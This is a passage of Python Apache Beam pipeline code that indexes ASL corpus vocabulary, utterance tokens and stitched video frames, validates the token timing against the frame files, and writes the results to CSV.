# TokenID=int(vocabulary_index_pcoll_row_tpl[0]),
# Token=vocabulary_index_pcoll_row_tpl[1]
# )
# need:
# (<token linguistic text>, <vocab token id>)
vocabulary_by_token_ling_text = (
vocabulary_index_pcoll
| beam.Map(
lambda vocabulary_index_pcoll_row: (
vocabulary_index_pcoll_row.Token,
vocabulary_index_pcoll_row.TokenID
)
)
)
document_asl_consultant_utterance_token_index_schemad_pcoll = (
({
'vocabulary_token_id_map': vocabulary_by_token_ling_text,
'doc_participant_utterance_token_info_map': doc_participant_utterance_by_token_ling_text
})
| "Beam PL: merge vocabulary_by_token_ling_text and doc_participant_utterance_by_token_ling_text" >> beam.CoGroupByKey()
# the above produces tuples in the form:
# (
# <token linguistic text>,
# {
# 'vocabulary_token_id_map': [1057],
# 'doc_participant_utterance_token_info_map': [(
# <corpus doc id>,
# <document fname>,
# <asl consultant id>,
# <participant name>,
# <utterance seq id>,
# <token (new) seq id>,
# <token start time>,
# <token end time>
# )]
# }
# )
| "Beam PL: validate/preprocess document_asl_consultant_utterance_token_tpl" >> beam.FlatMap(validate_preprocess_document_asl_consultant_utterance_token_tpl)
# the above produces tuples in the form:
# (
# <corpus doc id>,
# <document fname>,
# <asl consultant id>,
# <participant name>,
# <utterance seq id>,
# vocab_token_id,
# token_ling_text,
# _token_new_seq_id,
# _token_start_time,
# _token_end_time
# )
| "Beam PL: apply schema to document_asl_consultant_utterance_token rows" >> beam.Map(
lambda document_asl_consultant_utterance_token_tpl: beam.Row(
# SCHEMA_COL_NAMES__UTTERANCE_TOKEN_DS = [
# 'DocumentID',
# 'ASLConsultantID',
# 'UtteranceSequence',
# 'TokenSequence',
# 'StartTime',
# 'EndTime',
# 'TokenID',
# 'Field',
# 'FieldValue'
# ]
DocumentID=document_asl_consultant_utterance_token_tpl[0],
DocumentFilename=document_asl_consultant_utterance_token_tpl[1],
ASLConsultantID=document_asl_consultant_utterance_token_tpl[2],
ParticipantName=document_asl_consultant_utterance_token_tpl[3],
UtteranceSequence=document_asl_consultant_utterance_token_tpl[4],
TokenSequence=document_asl_consultant_utterance_token_tpl[7],
StartTime=document_asl_consultant_utterance_token_tpl[8],
EndTime=document_asl_consultant_utterance_token_tpl[9],
TokenID=document_asl_consultant_utterance_token_tpl[5],
Field='', # blank for now
FieldValue='' # blank for now
)
)
# debug
# | "Beam PL: print document_asl_consultant_utterance_token_index_schemad_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter("document_asl_consultant_utterance_token_index_schemad_pcoll entry"))
)
return vocabulary_index_pcoll, document_asl_consultant_utterance_token_index_schemad_pcoll
def pl__7__write_vocabulary_index_csv(vocabulary_index_pcoll, d_pl_options):
"""
vocabulary_index_pcoll:
beam.Row(
# SCHEMA_COL_NAMES__VOCABULARY_DS = [
# 'TokenID',
# 'Token'
# ]
TokenID=int(vocabulary_index_pcoll_row_tpl[0]),
Token=vocabulary_index_pcoll_row_tpl[1]
)
"""
sorted_vocabulary_index_pcoll = beam__common.pl__X__sort_pcoll(vocabulary_index_pcoll, pcoll_label="vocabulary_index")
sorted_vocabulary_index_csv_rows_pcoll = (
sorted_vocabulary_index_pcoll
| "Beam PL: re-apply schema to sorted_vocabulary_index_pcoll rows" >> beam.Map(
lambda sorted_vocabulary_index_pcoll_row: beam.Row(
# SCHEMA_COL_NAMES__VOCABULARY_DS = [
# 'TokenID',
# 'Token'
# ]
TokenID=sorted_vocabulary_index_pcoll_row.TokenID,
Token=sorted_vocabulary_index_pcoll_row.Token
)
)
| beam.Map(lambda vocabulary_index_pcoll_row: beam__common.beam_row_to_csv_string(vocabulary_index_pcoll_row))
)
return beam__common.pl__X__write_pcoll_to_csv(
sorted_vocabulary_index_csv_rows_pcoll,
"VOCABULARY-INDEX",
fidscs_globals.VOCABULARY_DS_FNAME,
fidscs_globals.SCHEMA_COL_NAMES__VOCABULARY_DS,
d_pl_options
) # vocabulary_index_csv_path
def pl__7__write_document_asl_consultant_utterance_token_index_csv(document_asl_consultant_utterance_token_index_schemad_pcoll, d_pl_options):
"""
document_asl_consultant_utterance_token_index_schemad_pcoll:
beam.Row(
# SCHEMA_COL_NAMES__UTTERANCE_TOKEN_DS = [
# 'DocumentID',
# 'ASLConsultantID',
# 'UtteranceSequence',
# 'TokenSequence',
# 'StartTime',
# 'EndTime',
# 'TokenID',
# 'Field',
# 'FieldValue'
# ]
DocumentID=document_asl_consultant_utterance_token_tpl[0],
DocumentFilename=document_asl_consultant_utterance_token_tpl[1],
ASLConsultantID=document_asl_consultant_utterance_token_tpl[2],
ParticipantName=document_asl_consultant_utterance_token_tpl[3],
UtteranceSequence=document_asl_consultant_utterance_token_tpl[4],
TokenSequence=document_asl_consultant_utterance_token_tpl[7],
StartTime=document_asl_consultant_utterance_token_tpl[8],
EndTime=document_asl_consultant_utterance_token_tpl[9],
TokenID=document_asl_consultant_utterance_token_tpl[5],
Field='', # blank for now
FieldValue='' # blank for now
)
"""
distinct_document_asl_consultant_utterance_token_index_pcoll = (
document_asl_consultant_utterance_token_index_schemad_pcoll
| "Beam PL: extract SCHEMA_COL_NAMES__UTTERANCE_TOKEN_DS columns from document_asl_consultant_utterance_token_index_schemad_pcoll" >> beam.Map(
lambda document_asl_consultant_utterance_token_index_schemad_pcoll_row: (
document_asl_consultant_utterance_token_index_schemad_pcoll_row.DocumentID,
document_asl_consultant_utterance_token_index_schemad_pcoll_row.ASLConsultantID,
document_asl_consultant_utterance_token_index_schemad_pcoll_row.UtteranceSequence,
document_asl_consultant_utterance_token_index_schemad_pcoll_row.TokenSequence,
document_asl_consultant_utterance_token_index_schemad_pcoll_row.StartTime,
document_asl_consultant_utterance_token_index_schemad_pcoll_row.EndTime,
document_asl_consultant_utterance_token_index_schemad_pcoll_row.TokenID,
document_asl_consultant_utterance_token_index_schemad_pcoll_row.Field,
document_asl_consultant_utterance_token_index_schemad_pcoll_row.FieldValue,
)
)
| "Beam PL: select distinct document_asl_consultant_utterance_token_index rows" >> beam.Distinct()
)
sorted_document_asl_consultant_utterance_token_index_schemad_pcoll = beam__common.pl__X__sort_pcoll(
distinct_document_asl_consultant_utterance_token_index_pcoll,
pcoll_label="document_asl_consultant_utterance_token_index"
)
sorted_document_asl_consultant_utterance_token_index_csv_rows_pcoll = (
sorted_document_asl_consultant_utterance_token_index_schemad_pcoll
| "Beam PL: apply minimal schema to create final document_asl_consultant_utterance_token_index_schemad_pcoll of distinct rows" >> beam.Map(
lambda distinct_document_asl_consultant_utterance_token_index_row: beam.Row(
DocumentID=int(distinct_document_asl_consultant_utterance_token_index_row[0]),
ASLConsultantID=int(distinct_document_asl_consultant_utterance_token_index_row[1]),
UtteranceSequence=int(distinct_document_asl_consultant_utterance_token_index_row[2]),
TokenSequence=int(distinct_document_asl_consultant_utterance_token_index_row[3]),
StartTime=int(distinct_document_asl_consultant_utterance_token_index_row[4]),
EndTime=int(distinct_document_asl_consultant_utterance_token_index_row[5]),
TokenID=int(distinct_document_asl_consultant_utterance_token_index_row[6]),
Field=str(distinct_document_asl_consultant_utterance_token_index_row[7]),
FieldValue=str(distinct_document_asl_consultant_utterance_token_index_row[8]),
)
)
| beam.Map(lambda distinct_document_asl_consultant_utterance_token_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(distinct_document_asl_consultant_utterance_token_index_schemad_pcoll_row))
)
return beam__common.pl__X__write_pcoll_to_csv(
sorted_document_asl_consultant_utterance_token_index_csv_rows_pcoll,
"DOCUMENT-ASLCONSULTANT-UTTERANCE-TOKEN-INDEX",
fidscs_globals.UTTERANCE_TOKEN_DS_FNAME,
fidscs_globals.SCHEMA_COL_NAMES__UTTERANCE_TOKEN_DS,
d_pl_options
) # document_asl_consultant_utterance_token_index_csv_path
def validate_preprocess_document_asl_consultant__to__target_video_utterance_token_map_tpl(document_asl_consultant__to__target_video_utterance_token_map_tpl, d_pl_options):
# document_asl_consultant__to__target_video_utterance_token_map_tpl:
# (
# (<corpus doc id>, <asl consultant id>), # key
# {
# 'target_video_map': [(<target video fname>, <camera perspective>)], # there may be up to three (corresponding to camera perspective)
# 'utterance_token_map': [(<utterance seq id>, <token seq id>, <token id>, <token start time>, <token end time>)] # there will be many (corresponding to each utterance)
# }
# )
validated_results = []
key = document_asl_consultant__to__target_video_utterance_token_map_tpl[0]
corpus_doc_id = key[0]
if corpus_doc_id is None or not isinstance(corpus_doc_id, int) or corpus_doc_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} corpus doc id is invalid: {corpus_doc_id}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
asl_consultant_id = key[1]
if asl_consultant_id is None or not isinstance(asl_consultant_id, int) or asl_consultant_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} asl consultant id is invalid: {asl_consultant_id}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
target_video_map = document_asl_consultant__to__target_video_utterance_token_map_tpl[1]['target_video_map']
if len(target_video_map)==0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} {key} target_video_map is empty!")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
utterance_token_map = document_asl_consultant__to__target_video_utterance_token_map_tpl[1]['utterance_token_map']
if len(utterance_token_map)==0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} {key} utterance_token_map is empty!")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
for i, utterance_token_map_instance in enumerate(utterance_token_map):
# (<utterance seq id>, <token seq id>, <token id>, <token start time>, <token end time>)
_utterance_seq_id = utterance_token_map_instance[0]
if _utterance_seq_id is None or not isinstance(_utterance_seq_id, int) or _utterance_seq_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] utterance_seq_id is invalid: {_utterance_seq_id}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
_token_seq_id = utterance_token_map_instance[1]
if _token_seq_id is None or not isinstance(_token_seq_id, int) or _token_seq_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_seq_id is invalid: {_token_seq_id}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
_token_id = utterance_token_map_instance[2]
if _token_id is None or not isinstance(_token_id, int) or _token_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_id is invalid: {_token_id}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
_token_start_time = utterance_token_map_instance[3]
if _token_start_time is None or not isinstance(_token_start_time, int) or _token_start_time<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_start_time is invalid: {_token_start_time}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
_token_end_time = utterance_token_map_instance[4]
if _token_end_time is None or not isinstance(_token_end_time, int) or _token_end_time<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_end_time is invalid: {_token_end_time}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
for j, target_video_map_instance in enumerate(target_video_map):
# (<target video fname>, <camera perspective>)
_target_video_fname = target_video_map_instance[0]
if _target_video_fname is None or len(_target_video_fname)==0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname is invalid: {_target_video_fname}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
target_video_frames_dir = fileio.path_join(fidscs_globals.STICHED_VIDEO_FRAMES_DIR, _target_video_fname.split('.')[0])
_n_existing_frame_images = -1 if not fileio.dir_path_exists(target_video_frames_dir, d_pl_options)[0] else len(fileio.list_dir(target_video_frames_dir, d_pl_options))
# if _n_existing_frame_images == -1:
# print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant__to__target_video_utterance_token_map_tpl utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname {_target_video_fname} frames dir ({target_video_frames_dir}) does not exist!")
_token_end_frame = _token_start_frame = -1
frame_seq_paths = []
if _n_existing_frame_images > 0:
_token_start_frame = int(round(_token_start_time/1000.0*fidscs_globals.FPS))
_token_end_frame = int(round(_token_end_time/1000.0*fidscs_globals.FPS))+1
n_frames = _token_end_frame-_token_start_frame
last_frame_idx = (_n_existing_frame_images-1)
if _token_start_frame > last_frame_idx:
# comment out for now
# print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname {_target_video_fname} _token_start_frame ({_token_start_frame}) > _n_existing_frame_images ({_n_existing_frame_images}): reconciling bounds of {n_frames} frames (from last frame index {last_frame_idx}) to {(last_frame_idx-(n_frames-1), last_frame_idx)}")
# return document_asl_consultant__to__target_video_utterance_token_map_tpl
# readjust bounds from last_frame_idx going backwards
_token_start_frame = last_frame_idx-(n_frames-1)
_token_end_frame = last_frame_idx
else:
if _token_end_frame > last_frame_idx:
# print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname {_target_video_fname} _token_end_frame ({_token_end_frame}) > _n_existing_frame_images ({_n_existing_frame_images}): reconciling _token_end_frame to {last_frame_idx}")
# return document_asl_consultant__to__target_video_utterance_token_map_tpl
# take all that is available to the end
_token_end_frame = last_frame_idx
if _token_start_frame <= last_frame_idx and _token_end_frame <= last_frame_idx:
for frame_idx in range(_token_start_frame, _token_end_frame+1):
frame_path = fileio.path_join(target_video_frames_dir, f"{frame_idx}.jpg")
if fileio.file_path_exists(frame_path)[0]:
frame_seq_paths.append(frame_path)
else:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname {_target_video_fname}: failed to reconcile invalid requested frame bounds {(_token_start_frame, _token_end_frame)} (valid bounds are: {(0, last_frame_idx)})")
# return document_asl_consultant__to__target_video_utterance_token_map_tpl
else:
if fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname {_target_video_fname} _token_end_frame ({_token_end_frame}) > _n_existing_frame_images ({_n_existing_frame_images}): reconciling _token_end_frame to {last_frame_idx}")
_camera_perspective = target_video_map_instance[1]
if _camera_perspective is None or not isinstance(_camera_perspective, int) or _camera_perspective<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] camera_perspective is invalid: {_camera_perspective}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
validated_results.append(
(
corpus_doc_id,
asl_consultant_id,
_target_video_fname,
_camera_perspective,
_utterance_seq_id,
_token_seq_id,
_token_id,
_token_start_time,
_token_end_time,
_token_start_frame,
_token_end_frame,
frame_seq_paths,
_n_existing_frame_images
)
)
return validated_results
def get_target_video_frame_paths(document_asl_consultant_target_video_index_schemad_pcoll_row, d_pl_options):
"""
document_asl_consultant_target_video_index_schemad_pcoll_row:
beam.Row(
DocumentID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][0]),
DocumentFileName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][0]),
ASLConsultantID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][1]),
ParticipantName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][1]),
CameraPerspective=int(document_asl_consultant_video_index_pcoll_row_tpl[1][3]),
TargetVideoFilename=str(document_asl_consultant_video_index_pcoll_row_tpl[1][2])
)
"""
stitched_video_frames_dir = d_pl_options[fidscs_globals.OPT_NAME_STITCHED_VIDEO_FRAMES_DIR]
target_video_frames_dir = fileio.path_join(stitched_video_frames_dir, document_asl_consultant_target_video_index_schemad_pcoll_row.TargetVideoFilename.split('.')[0])
target_video_frame_paths = []
if fileio.dir_path_exists(target_video_frames_dir, d_pl_options)[0]:
fs = FileSystems.get_filesystem(target_video_frames_dir)
if type(fs) == GCSFileSystem:
target_video_frame_paths = list(filter(lambda candidate_path: candidate_path.endswith(".jpg"), fileio.list_dir(target_video_frames_dir, d_pl_options, exclude_subdir=True)))
else:
target_video_frame_paths = [fileio.path_join(target_video_frames_dir, frame_fname) for frame_fname in fileio.list_dir(target_video_frames_dir, d_pl_options, exclude_subdir=True)]
target_video_frame_paths = sorted(
target_video_frame_paths,
key=lambda target_video_frame_path: int(target_video_frame_path.split(os.path.sep)[-1].split('.')[0])
)
# # target_video_frames = [(target_video_frame_path) for target_video_frame_path in target_video_frame_paths]
# for target_video_frame_path in target_video_frame_paths:
# img = load_img(target_video_frame_path, target_size=fidscs_globals.FRAME_IMG_INPUT_SHAPE) # this is a PIL image
# # img = load_img(target_video_frame_path) # this is a PIL image
# img_array = img_to_array(img)
# # x = img_array.reshape((1,) + img_array.shape)
# # # Rescale by 1/255
# # x /= 255.0
# target_video_frames.append((target_video_frame_path, img_array))
return [(
(
document_asl_consultant_target_video_index_schemad_pcoll_row.DocumentID,
document_asl_consultant_target_video_index_schemad_pcoll_row.ASLConsultantID,
document_asl_consultant_target_video_index_schemad_pcoll_row.CameraPerspective
),
(
document_asl_consultant_target_video_index_schemad_pcoll_row.TargetVideoFilename,
target_video_frame_paths
)
)]
class TargetVideoFramePathGetter(beam__common.PipelinePcollElementProcessor):
def __init__(self, d_pl_options):
super(TargetVideoFramePathGetter, self).__init__(
fn_pcoll_element_processor=get_target_video_frame_paths,
kargs={'d_pl_options':d_pl_options},
return_result=True
)
def target_video_frame_image_to_bytes(document_asl_consultant_target_video_index_schemad_pcoll_row_tpl):
"""
document_asl_consultant_target_video_index_schemad_pcoll_row_tpl:
((<corpus doc id>, <asl consultant id>, <camera perspective>), (<target video filename>, <target video frame seq id>, <target video frame path>))
"""
corpus_doc_id = document_asl_consultant_target_video_index_schemad_pcoll_row_tpl[0][0]
asl_consultant_id = document_asl_consultant_target_video_index_schemad_pcoll_row_tpl[0][1]
camera_perspective = document_asl_consultant_target_video_index_schemad_pcoll_row_tpl[0][2]
target_video_fname = document_asl_consultant_target_video_index_schemad_pcoll_row_tpl[1][0]
frame_seq_id = document_asl_consultant_target_video_index_schemad_pcoll_row_tpl[1][1]
frame_path = document_asl_consultant_target_video_index_schemad_pcoll_row_tpl[1][2]
# # frame_tensor = img_to_array(load_img(frame_path, target_size=fidscs_globals.FRAME_IMG_INPUT_SHAPE))
# img = load_img(frame_path, target_size=fidscs_globals.FRAME_IMG_INPUT_SHAPE)
# bytesio = io.BytesIO()
# img.save(bytesio, format='JPEG')
# jpeg_bytes = bytesio.getvalue()
# # now delete corresponding image file
# fileio.delete_file(frame_path)
# if fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__DEBUG:
# print(f"PROCESSED/DELETED target video frame: {frame_path}")
return (
(
corpus_doc_id,
asl_consultant_id,
camera_perspective
),
(
target_video_fname,
frame_seq_id,
frame_path
# , jpeg_bytes
)
)
def pl__7__create_document_asl_consultant_target_video_frame_index_schemad_pcoll(document_asl_consultant_target_video_index_schemad_pcoll, d_pl_options):
"""
document_asl_consultant_target_video_index_schemad_pcoll:
beam.Row(
# SCHEMA_COL_NAMES__VIDEO_DS = [
# 'DocumentID',
# 'ASLConsultantID',
# 'CameraPerspective',
# 'TargetVideoFilename'
# ]
DocumentID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][0]),
DocumentFileName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][0]),
ASLConsultantID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][1]),
ParticipantName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][1]),
CameraPerspective=int(document_asl_consultant_video_index_pcoll_row_tpl[1][3]),
TargetVideoFilename=str(document_asl_consultant_video_index_pcoll_row_tpl[1][2])
)
return schemad pcoll using:
SCHEMA_COL_NAMES__VIDEO_FRAME_DS = [
'DocumentID',
'ASLConsultantID',
'CameraPerspective',
# 'TargetVideoFilename',
'FrameSequence',
'ImageTensor'
]
"""
document_asl_consultant_target_video_frame_index_pcoll = (
document_asl_consultant_target_video_index_schemad_pcoll
| "Beam PL: extract ((<corpus doc id>, <asl consultant id>, <camera perspective>), (<target video filename>, listof(<target video frame path>))) "
# "from document_asl_consultant_target_video_index_schemad_pcoll" >> beam.Map(get_target_video_frame_paths)
"from document_asl_consultant_target_video_index_schemad_pcoll" >> beam.ParDo(TargetVideoFramePathGetter(d_pl_options))
| "Beam PL: filter out ((<corpus doc id>, <asl consultant id>, <camera perspective>), (<target video filename>, listof(<target video frame path>))) with empty listof(<target video frame path>)" >> beam.Filter(
lambda document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl: len(document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl[1])>0
)
| "Beam PL: 'explode' to ((<corpus doc id>, <asl consultant id>, <camera perspective>), (<target video filename>, <target video frame seq id>, <target video frame path>))" >> beam.FlatMap(
lambda document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl: [
(
(
document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl[0][0], # <corpus doc id>
document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl[0][1], # <asl consultant id>
document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl[0][2] # <camera perspective>
),
(
document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl[1][0],
target_video_frame_seq_id,
target_video_frame_path
)
) for target_video_frame_seq_id, target_video_frame_path in enumerate(document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl[1][1])
]
)
| "Beam PL: select distict ((<corpus doc id>, <asl consultant id>, <camera perspective>), (<target video filename>, <target video frame seq id>, <target video frame path>))" >> beam.Distinct()
# debug
# | "Beam PL: print document_asl_consultant_target_video_frame_index_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document_asl_consultant_target_video_frame_index_pcoll entry"))
)
sorted_document_asl_consultant_target_video_frame_index_pcoll = beam__common.pl__X__sort_pcoll(
document_asl_consultant_target_video_frame_index_pcoll,
pcoll_label="document_asl_consultant_target_video_frame_index_pcoll"
)
document_asl_consultant_target_video_frame_index_schemad_pcoll = (
sorted_document_asl_consultant_target_video_frame_index_pcoll # rows of ((<corpus doc id>, <asl consultant id>, <camera perspective>), (<target video filename>, <target video frame seq id>, <target video frame path>))
| "Beam PL: read target video frame to tensor" >> beam.Map(target_video_frame_image_to_bytes)
# the above outputs tuples of the form:
# ((<corpus doc id>, <asl consultant id>, <camera perspective>), (<target video filename>, <target video frame seq id>, <target video frame path>, <target video frame jpeg bytes>))
| "Beam PL: apply schema to create final document_asl_consultant_target_video_frame_index_schemad_pcoll" >> beam.Map(
lambda sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl: beam.Row(
# SCHEMA_COL_NAMES__VIDEO_FRAME_DS = [
# 'DocumentID',
# 'ASLConsultantID',
# 'CameraPerspective',
# 'TargetVideoFilename',
# 'FrameSequence',
# 'JPEGBytes'
# ]
DocumentID=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][0]),
ASLConsultantID=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][1]),
CameraPerspective=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][2]),
TargetVideoFilename=str(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][0]),
FrameSequence=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][1]),
FramePath=str(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][2])
# , JPEGBytes=sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][3]
)
)
# debug
# | "Beam PL: print document_asl_consultant_target_video_frame_index_schemad_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document_asl_consultant_target_video_frame_index_schemad_pcoll entry"))
)
return document_asl_consultant_target_video_frame_index_schemad_pcoll
def pl__8__write_document_asl_consultant_target_video_frame_index_schemad_pcoll(document_asl_consultant_target_video_frame_index_schemad_pcoll, d_pl_options):
document_asl_consultant_target_video_frame_index_csv_rows = (
document_asl_consultant_target_video_frame_index_schemad_pcoll
# | "Beam PL: extract SCHEMA_COL_NAMES__VIDEO_FRAME_DS only from document_asl_consultant_target_video_frame_index_schemad_pcoll" >> beam.Map(
# lambda document_asl_consultant_target_video_frame_index_schemad_pcoll_row: beam.Row(
# DocumentID=document_asl_consultant_target_video_frame_index_schemad_pcoll_row.DocumentID,
# ASLConsultantID=document_asl_consultant_target_video_frame_index_schemad_pcoll_row.ASLConsultantID,
# CameraPerspective=document_asl_consultant_target_video_frame_index_schemad_pcoll_row.CameraPerspective,
# TargetVideoFilename=document_asl_consultant_target_video_frame_index_schemad_pcoll_row.TargetVideoFilename,
# FrameSequence=document_asl_consultant_target_video_frame_index_schemad_pcoll_row.FrameSequence
# # , JPEGBytes=document_asl_consultant_target_video_frame_index_schemad_pcoll_row.JPEGBytes
# )
# )
| beam.Map(lambda document_asl_consultant_target_video_frame_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(document_asl_consultant_target_video_frame_index_schemad_pcoll_row))
)
return beam__common.pl__X__write_pcoll_to_csv(
document_asl_consultant_target_video_frame_index_csv_rows,
"DOCUMENT-ASLCONSULTANT-TARGETVIDEO-FRAME-INDEX",
fidscs_globals.VIDEO_FRAME_DS_FNAME,
fidscs_globals.SCHEMA_COL_NAMES__VIDEO_FRAME_DS,
d_pl_options
) # target_video_frame_index_csv_path
def validate_preprocess_document_asl_consultant__to__target_video_utterance_token_map_tpl(document_asl_consultant__to__target_video_utterance_token_map_tpl):
# document_asl_consultant__to__target_video_utterance_token_map_tpl:
# (
# (<corpus doc id>, <asl consultant id>), # key
# {
# 'target_video_map': [(<target video fname>, <camera perspective>)], # there may be up to three (corresponding to camera perspective)
# 'utterance_token_map': [(<utterance seq id>, <token seq id>, <token id>, <token start time>, <token end time>)] # there will be many (corresponding to each utterance)
# }
# )
validated_results = []
key = document_asl_consultant__to__target_video_utterance_token_map_tpl[0]
corpus_doc_id = key[0]
if corpus_doc_id is None or not isinstance(corpus_doc_id, int) or corpus_doc_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} corpus doc id is invalid: {corpus_doc_id}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
asl_consultant_id = key[1]
if asl_consultant_id is None or not isinstance(asl_consultant_id, int) or asl_consultant_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} asl consultant id is invalid: {asl_consultant_id}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
target_video_map = document_asl_consultant__to__target_video_utterance_token_map_tpl[1]['target_video_map']
if len(target_video_map)==0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} {key} target_video_map is empty!")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
utterance_token_map = document_asl_consultant__to__target_video_utterance_token_map_tpl[1]['utterance_token_map']
if len(utterance_token_map)==0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} {key} utterance_token_map is empty!")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
for i, utterance_token_map_instance in enumerate(utterance_token_map):
# (<utterance seq id>, <token seq id>, <token id>, <token start time>, <token end time>)
_utterance_seq_id = utterance_token_map_instance[0]
if _utterance_seq_id is None or not isinstance(_utterance_seq_id, int) or _utterance_seq_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] utterance_seq_id is invalid: {_utterance_seq_id}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
_token_seq_id = utterance_token_map_instance[1]
if _token_seq_id is None or not isinstance(_token_seq_id, int) or _token_seq_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_seq_id is invalid: {_token_seq_id}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
_token_id = utterance_token_map_instance[2]
if _token_id is None or not isinstance(_token_id, int) or _token_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_id is invalid: {_token_id}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
_token_start_time = utterance_token_map_instance[3]
if _token_start_time is None or not isinstance(_token_start_time, int) or _token_start_time<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_start_time is invalid: {_token_start_time}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
_token_end_time = utterance_token_map_instance[4]
if _token_end_time is None or not isinstance(_token_end_time, int) or _token_end_time<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_end_time is invalid: {_token_end_time}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
for j, target_video_map_instance in enumerate(target_video_map):
# (<target video fname>, <camera perspective>)
_target_video_fname = target_video_map_instance[0]
if _target_video_fname is None or len(_target_video_fname)==0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname is invalid: {_target_video_fname}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
target_video_frames_dir = fileio.path_join(fidscs_globals.STICHED_VIDEO_FRAMES_DIR, _target_video_fname.split('.')[0])
_n_existing_frame_images = -1 if not fileio.dir_path_exists(target_video_frames_dir)[0] else len(fileio.list_dir(target_video_frames_dir))
# if _n_existing_frame_images == -1:
